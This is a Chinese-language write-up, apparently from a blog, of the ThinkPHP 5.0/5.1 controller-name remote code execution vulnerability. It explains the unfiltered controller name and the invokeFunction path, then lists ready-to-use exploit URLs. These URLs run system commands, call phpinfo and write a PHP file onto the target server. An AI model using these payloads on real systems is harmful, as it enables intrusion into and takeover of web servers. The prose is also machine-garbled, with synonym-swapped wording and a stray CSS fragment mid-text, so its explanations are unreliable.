缝隙分析：

由于框架对控制器名没有停止充足的检测会致使在没有开启强迫路由的情况下能够的getshell 缝隙，受影响的版本(v5.0.23 及 v5.1.31 以下版本)，所以只管尽快的更新到最新版本。

文件：thinkphp/library/think/App.php

layui-box layui-code-view" style="margin-top: 0px; margin-bottom: 5px; padding: 15px; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); white-space: pre-wrap; overflow-wrap: break-word; box-sizing: inherit; position: relative; font-size: 15px; border: 1px solid rgb(209, 209, 209); background-color: rgb(255, 255, 255); color: rgb(68, 68, 68); font-family: inherit; outline: 0px; vertical-align: baseline; line-height: 28.5px; max-width: 100%; overflow: auto; word-break: break-all;">
code
// 获得控制器名
$controller       = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));

在修复之前法式未对控制器停止过滤，致使进犯者可以经过引入“\”标记来挪用肆意类方式。

缝隙道理：

现在我们先来说下,5.0 跟 5.1 的区分吧，tp5.1 中引入了容器(Container)和门面(Facade)这两个新的类  tp5.0 是没有这两个新的类的。

然后来看看 App 类里的 exec 函数里的履行分层控制器的操纵：

code
case 'controller': // 履行控制器操纵
$vars = array_merge(Request::instance()->param(), $dispatch['var']);
$data = Loader::action(
$dispatch['controller'],
$vars,
$config['url_controller_layer'],
$config['controller_suffix']
);
break;

这里我们是把 controller 的挪用信息跟设置信息全数传到了 invokeFunction 这个 履行函数里面去了

code
public static function invokeFunction($function, $vars = [])
{
$reflect = new \ReflectionFunction($function);
$args    = self::bindParams($reflect, $vars);
// 记录履行信息
self::$debug && Log::record('[ RUN ] ' . $reflect->__toString(), 'info');
return $reflect->invokeArgs($args);
}

由于 think\App 是第二个进口，在 tp 运转的时辰就会被加载 所以用 think\App 里面的分层控制器的履行操纵的时辰,需要去挪用 invokeFunction 这个函数。

这个函数有两个参数,跟上面图显现一样，第一个是函数的名字，第二个参数数组，比如$function 传入 baidu 然后$vars 传入[111,222]就相当于挪用 baidu(111,222)

缝隙操纵：

1.履行系统号令显现目录下文件：

code
Linux：
http://www.mysite.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
WIN:
http://www.mysite.com/index.php?s=/index/\think\request/cache&key=ls%20-l|system

2.履行 phpinfo

code
Linux：
http://www.mysite.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'
WIN:
http://www.mysite.com/index.php?s=/index/\think\request/cache&key=1|phpinfo

3.写入 info.php 文件

code
方式 1：
http://www.mysite.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php
方式 2：
http://www.mysite.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E

拜候 info.php